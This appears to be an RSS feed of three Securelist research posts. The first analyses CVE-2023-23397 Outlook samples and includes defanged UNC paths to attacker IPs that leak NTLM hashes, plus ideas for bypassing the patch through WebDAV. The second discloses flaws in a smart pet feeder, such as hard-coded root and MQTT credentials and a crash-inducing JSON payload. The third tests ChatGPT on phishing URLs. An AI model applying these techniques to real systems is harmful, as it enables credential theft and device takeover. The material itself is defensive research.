Research – Securelist https://securelist.com Wed, 19 Jul 2023 09:43:20 +0000 en-US hourly 1 https://wordpress.org/?v=6.2.2 https://securelist.com/wp-content/themes/securelist2020/assets/images/content/site-icon.png Research – Securelist https://securelist.com 32 32 Comprehensive analysis of initial attack samples exploiting CVE-2023-23397 vulnerability https://securelist.com/analysis-of-attack-samples-exploiting-cve-2023-23397/110202/ https://securelist.com/analysis-of-attack-samples-exploiting-cve-2023-23397/110202/#respond Wed, 19 Jul 2023 12:00:41 +0000 https://kasperskycontenthub.com/securelist/?p=110202

On March 14, 2023, Microsoft published a blogpost describing an Outlook Client Elevation of Privilege Vulnerability (CVSS: 9.8 CRITICAL). The publication generated a lot of activity among white, grey and black hat researchers, as well as lots of publications and tweets about the vulnerability and its exploitation. Below, we will highlight the key points and then focus on the initial use of this vulnerability by attackers before it became public.

Affected products include all supported versions of Microsoft Outlook for Windows. Other versions of Microsoft Outlook, such as those for Android, iOS, macOS, and Outlook on the web and other MS365 services, are not affected.

The CVE-2023-23397 vulnerability

From a technical point of view, the vulnerability is a critical EoP that is triggered when an attacker sends an Outlook object (task, message, or calendar event) within an extended MAPI property that contains a UNC path to an SMB share on a threat actor-controlled server, resulting in a Net-NTLMv2 hash leak. No user interaction is required. The NTLM leak occurs when the reminder window is displayed, not just when the message is received. However, an already expired reminder will be fired immediately upon receipt of the object!

The connection to the remote SMB server sends the user’s Net-NTLMv2 hash in a negotiation message, which the threat actor can use to either:

  • Relay for authentication against other systems that support NTLMv2 authentication.
  • Perform offline cracking to extract the password.

Note: as these are NTLMv2 hashes, they cannot be leveraged as part of a Pass-the-Hash technique.

The affected Net-NTLMv2 hash belongs to the user currently signed in to the Windows device where the Outlook client application is running, regardless of the identity that received the malicious message. If the user does not dismiss the Outlook reminder/task alert, or if the reminder is recurring (i.e., fires multiple times), the user’s Net-NTLMv2 hash may be leaked multiple times.

The vulnerability fix

The fix in the Outlook client code for CVE-2023-23397 is that Outlook’s PlayReminderSound() now calls IsFileZoneLocalIntranetOrTrusted(), which uses MapUrlToZone() to honor the SMB URI only if it is in a trusted/local zone. This means that a UNC path to an INTRANET/TRUSTED local zone can still be abused even on a patched MS Outlook client (SMB local exploitability should still be possible).

It appears that the implemented fix could be easily bypassed by forging the malicious UNC path with a particular format, then even a patched client could still be vulnerable (feature bypass vulnerability has been assigned CVE-2023-29324 and patched in May 2023) However, the hotfix is still effective on the server side and the exploit vector couldn’t be a CVE-2023-23397 patched Exchange server because it removes the extended MAPI property containing the malicious UNC path on any object in transit.

The WebDAV protocol

In the MS Guidance for investigating attacks using CVE-2023-23397,  there is a note about WebDAV reported below:
“Note: Interaction based on the WebDAV protocol is not at risk of leaking credentials via this exploit technique. While the threat actor infrastructure might request Net-NTLMv2 authentication, Windows will honor the defined internet security zones and will not send (leak) Net-NTLMv2 hashes. In other words, the vulnerability only affects the SMB protocol. If a target device can communicate to threat actor infrastructure over port 445 (SMB), Net-NTLMv2 hashes might be sent; however, if this communication via SMB is not possible, Windows will fall back to leveraging WebDAV. WebDAV will set up a connection with the threat actor infrastructure, but Net-NTLMv2 hashes will not be sent.”

It seems WebDAV already implements proper checks with regard to local intranet/trusted resources, and MS only considers the leak effective when it appears to an external entity. So, the logical assumption should be: “The WebDAV protocol is not at risk of leaking credentials via this exploit technique TO ANY NETWORK EXTERNAL ENTITY”. What about the local exploitability of WebDAV?

UNC paths can also be used to make a WebDAV request to an external domain, either by SMB falling back to WebDAV (if SMB traffic to the internet is blocked or otherwise fails, Windows will fall back to using WebDAV – if available – to try to complete the connection), or by forcing WebDAV by appending “@80” or “@SSL@443” to the host name.

Internal tests appear to confirm that WebDAV is locally abusable by forcing the use of WebDAV through appending @<port> to the hostname and by using a dotless hostname (considered local network zone by WebDAV); then local exploitability should be possible on a PATCHED client for both SMB and WebDAV.

The samples

Evidence of these vulnerabilities being exploited by an unknown attacker has been made public via the submission of samples to VirusTotal. Some samples submitted to VirusTotal in the past were later found to exploit CVE-2023-23397; others were published after the vulnerability was publicly disclosed.

Three variations of the samples were found on VirusTotal:

  • MSG format (full email with message header) -> provide usage time reference and a supposed target
  • EML format (full email with message header) -> provide usage time reference and a supposed target
  • TNEF format (only TASK attachment in TNEF format) -> NO time reference and NO supposed target

Many initial publications about these samples referred to April 2022 as the first available evidence because the “FirstSeen VT” field on the oldest sample timestamp was 2022-04-14 (with a received timestamp in the mail header on the same day).

However, a later sample appeared (in a different format – TNEF attachment in .eml – that was not detected by the first version of the YARA rule used by VirusTotal) with a “FirstSeen VT” timestamp of 2022-04-01 and a received timestamp in the mail header of 2022-03-18. In any case, the vulnerability was at the disposal of the first attacker for at least a year.

All publicly available samples found range from 2022-03-18 to 2023-03-29 (this is the last timestamp found in a sample related to a real-world exploit attempt by the attacker). All other samples with a “FirstSeen VT” timestamp starting from 2023-03-15 are mainly tests or POCs or just TNEF attachments missing target and reference timestamp details.

Sample list

Timeline of detected samples

  • Target: Government entity – UA

2022-03-18 – лист.eml
VT First Submission 2022-04-01 06:21:07 UTC
UNC path \\5.199.162.132\SCW (reminder time set to 2019-05-06 20:00)
Sent by: 5.199.162.132 on 2022-03-18 12:01:09 UTC <- THE OLDEST PUBLIC EVIDENCE FOUND TO DATE

  • Target: Government entity – RO

Happy Birthday..msg
VT First Submission 2022-04-14 11:49:27 UTC
UNC path \\101.255.119.42\event\2431 (reminder time set to 2020-10-06 20:00)
Sent by: 101.255.119.42 on 2022-04-14 10:35:39 UTC

Celebration.msg
VT First Submission 2022-05-18 07:26:26 UTC
UNC path \\101.255.119.42\mail\a5b3553d (reminder time set to 2020-04-07 11:30)
Sent by: 101.255.119.42 on 2022-05-17 14:21:25 UTC

  • Target: Energy transportation critical infrastructure – PO

Information!.msg
VT First Submission 2022-08-05 08:22:49 UTC
UNC path relates to 181.209.99.204 based on VT information should be \\181.209.99.204\information

  • Target: Military supplier – PO

Silence..eml
VT First Submission 2023-03-23 09:03:23 UTC, but its TNEF attachment VT First Submission 2022-09-29 11:29:43 UTC
UNC path \\213.32.252.221\silence (reminder time set to 2020-03-10 10:30)
Sent by: 213.32.252.221 on 2022-09-09 09:04:23 UTC

  • Target: Transportation critical infrastructure – PO

Interest..msg
VT First Submission 2022-10-05 14:10:40 UTC
UNC path relate to 213.32.252.221 based on VT information

  • Target: Government entity – JO

Information!.msg
VT First Submission 2022-10-25 10:00:00 UTC
UNC path \\168.205.200.55\test (reminder time set to 2019-02-17 19:00)
Sent by: 168.205.200.55 on 2022-10-25 09:12:02 UTC

  • Target: Transport critical infrastructure – PO

Fwd..msg
VT First Submission 2022-11-04 09:28:28 UTC
UNC path \\213.32.252.221\fwd (reminder time set to 2020-03-17 02:30)
Sent by: 213.32.252.221 on 2022-11-03 11:07:23 UTC

Fwd..msg
VT First Submission 2022-11-04 09:27:32 UTC

Silence..msg
VT First Submission 2022-11-04 18:41:05 UTC

Silence..msg
VT First Submission 2022-11-08 20:41:31 UTC

Silence..msg
VT First Submission 2022-11-09 06:50:41 UTC
UNC path relate to 213.32.252.221 based on VT infos

  • Target: Energy transportation critical infrastructure – UA

Fwd..msg VT First Submission 2022-12-01 09:37:36 UTC
UNC path \\69.162.253.21\pets (reminder time set to 2020-03-09 23:30)
Sent on 2022-12-01 06:18:15 UTC

Fwd..msg
VT First Submission 2022-12-01 12:19:18 UTC
UNC path \\185.132.17.160\aojv43 (reminder time set to 2021-04-21 11:30)
Sent on 2022-12-01 11:59:46 UTC

  • Target: Energy production critical infrastructure – UA

Report.eml
VT First Submission 2022-12-14 08:47:25 UTC
UNC path \\69.51.2.106\report (reminder time set to 2021-05-19 00:30)
Sent by: 69.51.2.106 on 2022-12-14 07:05:18 UTC

  • Target: Military supplier – TK

Ticaret.msg
VT First Submission 2022-12-29 13:00:43 UTC & VT First Submission 2023-03-16 13:05:21 UTC
UNC path \\113.160.234.229\istanbul (reminder time set to 2022-09-05 22:00)
Sent by: 113.160.234.229 on 2022-12-29 12:39:33 UTC

  • Target: Government entity – UA

Unknown
VT First Submission 2023-03-21 10:47:06 UTC
UNC path \\85.195.206.7\lrmng
Sent by: 85.195.206.7 on 2023-03-15 16:07:48 UTC

  • Target: Military interforce entity – TK

Alarms!.msg
VT First Submission 2023-03-16 13:02:30 UTC
UNC path \\85.195.206.7\lrmng (reminder time set to 2022-02-03 23:30)
Sent by: 85.195.206.7 on 2023-03-15 16:15:07 UTC

  • Target: Space military supplier – IT

Power!
VT First Submission 2023-03-20 07:55:32 UTC
UNC path \\85.195.206.7\power (reminder time set to 2022-01-31 23:30)
Sent by: 77.238.121.148 on 2023-03-17 14:04:54 UTC

  • Target: IT integrator – UA

Reminder!
VT First Submission 2023-03-22 12:20:44 UTC
UNC path \\61.14.68.33\rem (reminder time set to 2022-06-28 21:30)
Sent by: 77.238.121.148 on 2023-03-21 11:13:14 UTC

  • Target: Government entity – SK

Reminder!.eml
VT First Submission 2023-03-29 06:51:54 UTC
UNC path \\61.14.68.33\rem (reminder time set to 2022-06-28 21:30)
Sent by: 77.238.121.148 on 2023-03-22 09:13:09 UTC

Reminder!.eml
VT First Submission 2023-03-27 08:59:44 UTC
UNC path \\61.14.68.33\rem (reminder time set to 2022-06-28 21:30)
Sent by: 77.238.121.148 on 2023-03-22 09:17:19 UTC

  • Target: IT integrator – UA

CC.eml
VT First Submission 2023-03-29 13:51:50 UTC
UNC path \\42.98.5.225\ping (reminder time set to 2023-01-31 01:00)
Sent by: 42.98.5.225 on 2023-03-29 12:36:10 UTC

Initial attack IOCs

Threat-relevant IOCs are the embedded malicious UNC paths and IPs (not hashes of sample files, which are just an export in MSG/EML format of the malicious TASK exploiting the vulnerability and useless for threat detection/verification).

URLs (#16)

\\5.199.162[.]132\SCW
\\101.255.119[.]42\event\2431
\\101.255.119[.]42\mail\a5b3553d
\\181.209.99[.]204\information
\\213.32.252[.]221\silence
\\168.205.200[.]55\test
\\213.32.252[.]221\fwd
\\69.162.253[.]21\pets
\\185.132.17[.]160\aojv43
\\69.51.2[].106\report
\\113.160.234[.]229\istanbul
\\85.195.206[.]7\lrmng
\\24.142.165[.]2\req
\\85.195.206[.]7\power
\\61.14.68[.]33\rem
\\42.98.5[.]225\ping

IPs (#14)

5.199.162[.]132 (not in MS Guidance publication)
101.255.119[.]42
181.209.99[.]204
213.32.252[.]221
168.205.200[.]55
69.162.253[.]21
185.132.17[.]160
69.51.2[.]106 (not in MS Guidance publication)
113.160.234[.]229
85.195.206[.]7
24.142.165[.]2 (not in MS Guidance publication)
61.14.68[.]33
42.98.5[.]225 (not in MS Guidance publication)
82.196.113[.]102 (only in MS Guidance publication – on VT relating to hash 92df1d2125f88d0642e0d4919644376c09e1f1e0eaf48c31a6b389265e0d5576, but missing the sample and any additional information)

Threat verification

Any attempt to communicate to the IPs/URIs listed in the above IOCs and found in any logs should be considered suspicious and investigated further.

Alternatively, to determine if an organization has been targeted by attempts to exploit this vulnerability, Microsoft has provided documentation for a script that checks all Outlook objects (tasks, email messages and calendar items) to see if the specific property is populated with a UNC path. If objects are detected that point to an unrecognized share, they should be investigated further. Microsoft has provided detailed guidance on how to do this.

A note about attacker infrastructure

It’s easy to see that many of the IPs used by the attacker have/had similarities in terms of connected equipment.

IP Net exposed service history
5.199.162[.]132 No Info
101.255.119[.]42 HTTP redirect to HTTPS, HTTPS cert Subject: C=US, CN=UBNT Router UI, O=Ubiquiti Networks, SSH on port 2222
181.209.99[.]204 HTTP redirect to HTTPS, HTTPS cert Subject: C=US, CN=UBNT Router UI, O=Ubiquiti Networks
213.32.252[.]221 HTTP redirect to HTTPS, HTTPS cert Subject: C=US, CN=UBNT Router UI, O=Ubiquiti Networks
168.205.200[.]55 HTTP redirect to HTTPS, HTTPS cert Subject: C=US, CN=UBNT Router UI, O=Ubiquiti Networks, port UDP 10001 Ubiquiti Networks Device_Hostname: _Product: N5N_Version: XM.ar7240.v5.6.6.29183.160526.1225 @2022-06-16
69.162.253[.]21 HTTP redirect to HTTPS, HTTPS cert Subject: C=US, CN=UBNT Router UI, O=Ubiquiti Networks, port UDP 10001
185.132.17[.]160 HTTP redirect to HTTPS, HTTPS cert Subject: C=US, CN=UBNT Router UI, O=Ubiquiti Networks, SSH on port 2222
69.51.2[.]106 HTTP redirect to HTTPS, HTTPS cert Subject: C=US, CN=UBNT Router UI, O=Ubiquiti Networks, SSH on port 2222
113.160.234[.]229 HTTP redirect to HTTPS, HTTPS cert Subject: C=US, CN=UBNT Router UI, O=Ubiquiti Networks, SSH on port 2222
85.195.206[.]7 HTTP redirect to HTTPS, HTTPS cert Subject: C=US, CN=UBNT Router UI, O=Ubiquiti Networks
24.142.165.2 No Info
61.14.68[.]33 HTTP redirect to HTTPS, HTTPS cert Subject: C=US, CN=UBNT Router UI, O=Ubiquiti Networks, SSH on port 2222
42.98.5[.]225 HTTP redirect to HTTPS, HTTPS cert Subject: C=US, CN=UBNT Router UI, O=Ubiquiti Networks, SSH on port 2222
82.196.113[.]102 HTTP redirect to HTTPS, HTTPS cert Subject: C=US, CN=UBNT Router UI, O=Ubiquiti Networks, SSH on port 2222

This is obviously not random, but a common point for the attacker.

One of the IPs used by the attacker exposes the WebUI of an internet access router:

Some researchers have argued that an attacker may have exploited a vulnerability in the firmware of these routers to compromise them and use them in the attack. This may be possible, but it may also be that the attacker simply found this router configured with weak/default credentials and exploited it.

Further investigation into the type of network equipment used by the attacker confirmed that it could be an optimal platform for the threat. For example, this router is typically used by ISPs on the customer side and its firmware provides a Command Line Interface (CLI) accessible directly through a WebUI. Use of the CLI from WebUI doesn’t leave any source IP information in the OS logs because the connection originates locally from 127.0.0.1; only traces of connections to the WebUI could be stored in the firewall logs.

The screenshot of the router’s CLI (obtained from the test equipment)

Moreover, the router’s operating system has native Python 2.7 and there’s already a well-known fake SMB server for collecting NTLM hashes implemented by the hacking tool named “Responder”, which is coded as a Python script. It is worth noting that running an open SMB server on the public internet will receive a lot of connections due to scanning attempts unrelated to the use of the attacker’s samples. Thus, we can assume that the attacker collected all the data from the fake SMB server and then post-processed it to exclude the scanning attempts, extracting only the threat-relevant data.

In any case, using routers connected to the public internet as a source of attack is a clever way to collect the threat targets’ data without relying on a host, and it includes an easy way to delete any logs/traces of the malicious activity. ISP routers might have more aspect of its OS architecture that allow cybercriminals to exploit it for malicious activity, such as publicly known default credentials or highly volatile logs that are not recording the source IP information and can be lost with a simple reboot. For example, for the router which is assumed to have been used in the attack the log folder is mounted on a volatile in-memory filesystem:

tmpfs /var/log tmpfs rw,nosuid,nodev,noexec,relatime,mode=755 0 0

Organizations safeguard against cyberthreats targeting ISP routers through regular firmware updates, strong authentication, network segmentation, firewall configuration, IDPS deployment, monitoring and logging, as well as network traffic analysis, security awareness training for employees and regular security assessments.

]]>
https://securelist.com/analysis-of-attack-samples-exploiting-cve-2023-23397/110202/feed/ 0 full large medium thumbnail
A bowl full of security problems: Examining the vulnerabilities of smart pet feeders https://securelist.com/smart-pet-feeder-vulnerabilities/110028/ https://securelist.com/smart-pet-feeder-vulnerabilities/110028/#respond Tue, 20 Jun 2023 10:00:55 +0000 https://kasperskycontenthub.com/securelist/?p=110028

Introduction

In today’s interconnected world, more and more devices are being connected to the internet, including everyday household items like pet feeders that are becoming smart by virtue of this simple fact. However, as these devices become more sophisticated, they also become more vulnerable to cyberattacks. In this blog post, we’ll discuss the results of a vulnerability research study focused on a popular model of smart pet feeder. The findings of the study reveal a number of serious security issues, including the use of hard-coded credentials, and an insecure firmware update process. These vulnerabilities could allow an attacker to gain unauthorized access to the device and steal sensitive information, such as video footage, potentially turning the feeder into a surveillance tool. In addition, tampering with the feeding schedules could endanger the pet’s health and place an additional financial and emotional burden on the owner. Finally, it highlights the risks of a chain reaction type of attack, as once an attacker gains control of a pet feeder in the home network, it can be used as a hub to launch more attacks against other devices in the network.

Smart pet feeders: What they do

Smart pet feeders are internet-connected devices that dispense pre-set portions of food according to a pre-set schedule and allow you to monitor or communicate with your pet remotely. For the latter purpose they are often equipped with a microphone, speaker and camera.

Typically, pet feeders are controlled by a mobile application that allows you to set, update and manage them. Communication between the device and the app takes place via a cloud server. The first time the feeder is used, the user must set up the wireless network that the feeder will use from this app.

Methodology

For this research, we chose a popular Dogness device model and were able to identify security issues in it. We approached the device by first analyzing the network communication traffic between the mobile application and the cloud, and between the cloud and the pet feeder. We did this by placing the device in a sandboxed environment from the outset. We also used dynamic instrumentation to bypass SSL certificate verification (SSL pinning) from the application. For convenience, the app ran on a single board computer ARM64 (Raspberry Pi 4b) running Android 11.

The described setup allowed us to verify the information passing through, for example, during the over-the-air update process.

Then, more specifically, we analyzed the mobile application itself using static reverse engineering of the different use cases.

We also proceeded to crack open the device, looking for debugging interfaces that would allow us to interact with the running device while having full access to its internals. Further hardware analysis of the circuit board helped us identify chips. We later managed to extract the firmware from the EEPROM for further static reverse engineering. Where relevant, fuzzing of some key libraries was performed to try to identify memory corruption bugs in the request handling functions.

Telnet running with hard-coded root credentials

One of the major vulnerabilities discovered in the smart pet feeder is the presence of a Telnet server running on the default port, with a root account that can be accessed remotely. The root account credentials for this Telnet server can be easily recovered by extracting the firmware from the device and cracking the hashes from the /etc/shadow file. A hard-coded root password is a significant security issue because all devices of the same model share the same root password.

The hard-coded root password

The hard-coded root password

This root account can be used over the previously mentioned Telnet service on port 23 to gain full access to the device.

Connection to Telnet port 23 using the hard-coded root password

Connection to Telnet port 23 using the hard-coded root password

A remote attacker with such access can execute arbitrary code, modify the device settings, and steal sensitive information, including live video being recorded and sent to the cloud server.

Plaintext communication with the cloud

Not only is gaining access trivial, but the feeder’s communication with the cloud, including the authentication process, is in cleartext. This vulnerability is also particularly dangerous because it allows a remote attacker sitting between the device and the cloud to gain persistence on the pet feeder – even without having access to the device firmware – and to launch further attacks against other devices in the network and potentially steal more sensitive information such as personal identification information, credit card details, or other personal information.

Smart device manufacturers should focus on adding security features such as dynamic credential generation and secure communication protocols to ensure the safety of their products.

MQTT broker for Alexa support with hard-coded credentials

The Dogness smart pet feeder device has the ability to work with Alexa, allowing users to control the device through voice commands. The device uses an executable file that connects to a Message Queuing Telemetry Transport (MQTT) broker to receive and process Alexa commands. The problem with this setup is that the user name and password for the MQTT broker are hard-coded into the executable. This means that the credentials are embedded in the software and are the same for all devices of the same model.

The hard-coded MQTT broker credentials

The hard-coded MQTT broker credentials

The Alexa communication process is as follows. The device launches a binary called mqtt_alex that embeds the MQTT client code, which tries to connect to a server IP provided as an argument, and then tries to connect to a hard-coded domain name if it fails. Another IP address is found in the bash script called run_alex.sh that launches the mqtt_alex binary, but it’s commented out, which may indicate that this IP address belongs to a vendor test environment.

Upon successful connection, a series of subscription calls is made to the following topics, where the last subtopic level corresponds to the device ID.

Subscription calls

Subscription calls

The device ID used is a 20-byte string generated by the /usr/sbin/get_uid utility at first boot based on the MAC address and two values called ‘uboot UID’ and ‘uboot encrypt’, which are then stored in a temporary file at /tmp/ipcam.txt. The latter two values are static and retrieved from NVRAM, while the first is obviously the only device-dependent value. The device ID is later loaded at the beginning of the MQTT client launch for further communication.

Device ID generation

Device ID generation

Device ID generation

An attacker connected to the MQTT broker could subscribe to a wildcard topic such as /voice/# to easily get notified of all messages, including the identifiers of other devices. Armed with these identifiers, any command related to the pet’s feeding schedule or food dispensing can be sent to any of the devices whose identifiers have been previously collected by publishing an MQTT message. So, the moment you connect your pet feeder to the MQTT broker to enable voice command control via Alexa, you need to be aware that you are no longer the only one who can set your pets’ feeding schedule.

The hard-coded credentials pose a significant security risk because an attacker can use them to connect to the MQTT broker. Once connected, an attacker can intercept and modify commands being sent to the device, potentially allowing them to take control of the device. It is critical that manufacturers use dynamic and unique credentials for each device.

Alexa voice command functionality denial of service

The aforementioned MQTT client for handling voice commands receives messages in JSON format, structured like the following example:

{"cmd": "shootreq","feedweight": "1","audioindex": "0","rand": "0"}

The client code responsible for parsing the received MQTT payload simply uses a set of JSON utility functions that call cJSON_GetObjectItem to get each attribute in a separate variable for later use in further internal communication.

JSON utility functions

JSON utility functions

Although there is no guarantee these calls to the cJSON_GetObjectItem function will not return NULL, the code assumes that they never will. Upon receiving a correctly formatted JSON, with all the attributes, the device will handle it normally and acknowledge with a corresponding resp topic.

Command messages

Command messages

However, if it receives an incomplete JSON in which at least one of the attributes is missing, the client simply crashes. The following illustrates a JSON payload with the audioindex attribute removed. By exploiting this vulnerability, an attacker would be limited to performing a denial-of-service attack on the device’s voice control functionality. We also need to keep in mind that the run_alex.sh script will restart the binary if it stops.

Broken command message

Broken command message

The bug in the code that parses MQTT messages can lead to a potential denial of service, preventing this functionality from working normally. Although the MQTT client is reloaded after a crash, the attacker can repeatedly send broken commands, rendering the voice command interface inoperable.

Insecure communication with the backend server

While from the mobile application point of view communication with the cloud is handled via HTTPS with certificate pinning, the device itself behaves differently. The device functions that handle communication are located in a shared library that includes j_processCommandUploadVideo, which is used to upload footage to the backend.

Device functions including j_processCommandUploadVideo

Device functions including j_processCommandUploadVideo

The video footage is pushed to the server using the curl utility, with multiple parameters, including the device ID and an upload key that is hard-coded into the binary. As you can see in the image below, the request is made over a cleartext HTTP connection to the backend server.

Pushing video footage to the cloud

Pushing video footage to the cloud

This issue could significantly impact confidentiality, as the device works as a continuous recording camera that is likely to be used indoors, with a strong possibility of capturing a private home environment that may contain sensitive information.

Insecure update process

The Dogness smart pet feeder uses an insecure firmware update process that allows attackers to potentially compromise the device. The firmware update process uses HTTP, an unencrypted protocol, to download the update package from the update server. The package is a compressed archive protected by a password. This password is hard-coded in one of the scripts used in the update process.

The hard-coded ZIP archive password

The hard-coded ZIP archive password

The HTTP URL to the latest firmware file is generated by the device after receiving the information from a URL hard-coded into the firmware.

http://                       /IMG_Server/images/server_list.txt

Attempting to provide a firmware verification routine that relies on a password-protected archive is insecure because the password can easily be extracted from the firmware, bypassing this verification. However, no other verification mechanisms, such as a digital signature, are implemented in these devices. This is a security issue because an attacker could modify the legitimate firmware or craft new firmware and load it to the device. In addition, because the communication is in cleartext over the network, an attacker could intercept the data and use it to inject malicious code into the firmware.

Manufacturers should sign their firmware files and establish a reliable signature verification mechanism to ensure the firmware is legitimate and has not been tampered with. Also, any such communication over the network should initially be over secure protocols such as HTTPS.

Conclusion

Assessing the security of devices such as smart pet feeders is not that different from auditing a smart camera with physical actuators that can be remotely controlled. The typical architecture includes various parts, including mobile applications, cloud backend and the device itself, all of which are involved in the operation and maintenance of the device.

To keep users safe, vendors must ensure that all communications to and from the device are protected from eavesdropping and tampering, especially during critical operations such as firmware updates. Using HTTPS instead of HTTP and enforcing certificate pinning not only in the app, but also on the device itself, typically makes it unlikely that an attacker can perform a man-in-the-middle attack. As an additional measure, enforcing firmware signature verification is one way to ensure a firmware update has not been modified or corrupted during the download process. In addition, implementing firmware verification at the boot level also adds another layer of protection by preventing modification via direct hardware access to the memory chip.

Secure credentials management in embedded devices is not necessarily a straightforward issue. Ensuring no hard-coded credentials provide access to anything on the device is a good security practice. Manufacturers must generate credentials at the time of manufacture on a per-device basis, in a way that cannot be guessed based on any available information. For example, using the device’s MAC address as a unique seed for a hash algorithm could eventually be reversed by a motivated attacker. The same concept applies to user-generated/provided credentials that may be stored on the device. Ensuring they are stored in a secure manner that prevents or makes it difficult for an attacker with physical access to extract them is an important security requirement.

Also, any services that can be accessed remotely must undergo a thorough security assessment, especially those that don’t serve the primary purpose of the device. Ideally, if any of these expose users to potential security risks, the vendor should make that clear to the users, along with some practical ways to mitigate those risks. When a firmware update comes out, it is also good practice to point out what kind of security issues it fixes, when it fixes them, and emphasize the risks being eliminated.

Finally, as with any system, users need to keep it updated to ensure they have the vendor’s latest software fixes, including those related to security. As for personal data, it is reasonable to assume the device may store information such as the user’s Wi-Fi credentials in a way that is potentially accessible to anyone with physical access to it, so it is important to perform a hard reset as described in the product manual before reselling or disposing of the device. For the more tech-savvy, a good practice is to connect these devices in a separate network away from critical devices such as home and work computers. Internet providers now ship home routers that can, for example, spin up an additional guest network. This might be a place to consider connecting such IoT devices to reduce the potential damage from unpatched or undiscovered vulnerabilities.

Timeline of communication with the vendor

  • 17/10/2022        First attempt to establish contact with the vendor by email -> No answer
  • 07/11/2022        Second attempt to establish contact with the vendor by email and via social media accounts -> No answer
  • 15/11/2022        Third attempt to establish contact with the vendor by email -> No answer
  • 08/02/2023        Attempt to establish contact with the vendor through the US customer support line by phone -> No answer
  • 21/02/2023        First attempt to establish contact with the vendor through the Chinese customer support line by phone à Promised to share an R&D contact à No answer
  • 06/03/2023        Second attempt to establish contact with the vendor through Chinese customer support line by phone -> Shared R&D email contact at Dogness
  • 08/03/2023        Attempt to establish a secure channel for communication with the vendor by email   -> No answer
]]>
https://securelist.com/smart-pet-feeder-vulnerabilities/110028/feed/ 0 full large medium thumbnail
What does ChatGPT know about phishing? https://securelist.com/chatgpt-anti-phishing/109590/ https://securelist.com/chatgpt-anti-phishing/109590/#comments Mon, 01 May 2023 10:00:20 +0000 https://kasperskycontenthub.com/securelist/?p=109590

Hearing all the buzz about the amazing applications of ChatGPT and other language models, our team could not help but ask this question. We work on applying machine learning technologies to cybersecurity tasks, specifically models that analyze websites to detect threats such as phishing. What if all our complex, multi-layered detection systems are now obsolete, and a single LLM (large language model) to rule them all can fight cybercriminals better than we do?

To answer this question, we conducted an experiment to see how good ChatGPT is at recognizing overtly malicious links. In this article, we provide a practical example of how an LLM can be applied to a real, albeit simplified, cybersecurity task, and describe all the interesting things we learned along the way. Since we didn’t have any illusions that ChatGPT could actually be used as a detection method, our primary goal was to find out how much cybersecurity knowledge ChatGPT has learned from its training data and how it could possibly assist a human analyst in their job.

Why URL classification?

An analyst’s trained eye can spot an obviously malicious link in a split second (and you probably can too):

hxxp://caseld-10xxxx.info/1/Office365/0fflce3.6.5/live/login.php

  • This is not the Office365 login link, is it?

(links in the article are partially masked with x)

A rule of thumb for finding tasks to which ML can be applied is that if a person can do it instantly, almost without thinking, it’s probably a good candidate. Still, building a machine-learning system requires a lot of effort, from gathering data and crafting features to preparing the infrastructure. The promise of replacing all that with a single interface configured via natural language sounds too good to be true, but just how far is it from being a reality?

When conducting this experiment, we were well aware of the limitations of large language models, as well as the fact that OpenAI asks that this emerging technology not be applied to any high-risk area, and state the following regarding GPT-4’s cybersecurity applications in the system card:

However, GPT-4 has significant limitations for cybersecurity operations due to its “hallucination” tendency and limited context window.

It is natural to assume that GPT-3.5-turbo will exhibit these limitations to a greater extent.

We chose the URL classification task because:

  • Unlike a whole HTML page, a URL fits easily into an LLM, because modern LLMs, such as ChatGPT, can only consume a limited number of symbols (more precisely, tokens) at a time (they have a fixed context window, in LLM-speak).
  • Obviously malicious links are easy to detect, but the task is still non-trivial, because it requires world knowledge (for example, knowing the names of popular web services).
  • URLs are still text, and LLMs are good at processing text.

So here is what we did.

Let’s talk?

First of all, we opened the ChatGPT web interface and checked if what we wanted was even possible:

Judging by the URL, is this link a phishing attempt? Please explain why. Link: hxxp://caseld-10xxxx.info/1/Office365/0fflce3.6.5/live/login.php

Yes, it is likely a phishing attempt.

The URL appears to be intentionally deceptive, as it contains several red flags:

  • The domain name “caseld-10xxxx.info” is not associated with any reputable or recognizable entity, and it looks like a random sequence of letters and numbers.
  • The URL uses the term “Office365” which is a popular productivity suite, and it is a common target for phishing attacks. Cybercriminals often use this tactic to lure unsuspecting victims into clicking on a link and disclosing sensitive information.
  • The word “live” in the URL could be used to imply that the page is an official Microsoft Office365 login page, as Microsoft has used “live” in the past in some of its services.
  • The misspelling of “Office” as “0fflce” is another red flag as it is a common tactic used by phishers to trick users into believing the website is legitimate.
  • The “.php” extension at the end of the URL suggests that it is a PHP script running on a server, which is commonly used in phishing attacks to harvest login credentials.

Therefore, it is advisable to avoid clicking on such links and to always check the URL’s legitimacy before entering any personal information or credentials.

This is a pretty reasonable explanation. Aside from the fact that the model shows some distrust of PHP (well, who doesn’t?), it is good at recognizing the target organization, a homographic attack (0ffice), and even points out why “live” might have been used. This is an explanation worthy of a junior analyst.

To gather a corpus of explanations, we used OpenAI API to query the model called GPT-3.5-turbo, which is the backend for ChatGPT. It is fast and cheap (we check a lot of links), but still powerful enough. For the test corpus, we gathered a few thousand links that our detection technologies deemed phishing, and threw in a few thousand safe URLs.

Attempt 1. Is it phishing?

ChatGPT is great at providing the answer in the form that you require – from poems:

And lastly, “0fflce” it doth spell amiss,

A trick oft used by phishers with a hiss.

Beware, dear user, and take great care,

Lest thou fall victim to this cyber snare.

to machine-readable formats. It can also do more than one thing at once. This means that in addition to the yes/no answer to the question about link safety, we could ask ChatGPT to format the response as JSON and also to include a rationale, as well as the possible target. So, after a few iterations, we settled on the following prompt:

{"role": "system", "content": "You are CyberGPT, a guru cyber security assistant AI."},
        {
            "role": "user", 
            "content": 'Does this link lead to a phish website? Answer in the json format {"phish": "yes|no", "reasoning": "detailed explanation why", "target_company": "possible targeted company"}\nLink: ' + url
        }

We use a system prompt here (according to practitioners and docs, this is less important than the user input) that portrays ChatGPT as a cybersecurity chatbot and ask for its verdict in the user prompt. Frankly, the fact that it is so easy to get the desired output from ChatGPT is awe-inspiring.

It took us two nights to get about 6,000 verdicts (probably because we ran the experiment at the peak of all the hype), and once we got the data, we proceeded to parse the results.

Unfortunately, while most of the outputs could be parsed as is, some were corrupted: some contained additional text, such as “Note: be careful when opening links…” or just a dot at the end, others had unnecessary escape characters. All in all, less than 0.5% of JSONs were broken beyond automated fixes or contained text such as:

I am sorry, but as an AI language model, I am not able to access the internet or browse the website provided. However, as per the standard industry practices, you can check the legitimacy of the website by running it through a reputable online phishing detection service/provider. Additionally, if there are any official reports of phishing attacks or scams associated with the target company, it further increases the likelihood of the link leading to a phish website.

Which is still a reasonable answer.

All in all, after all the errors and rejections, we were left with a dataset of 2322 phish and 2943 safe URLs. The resulting metrics are:

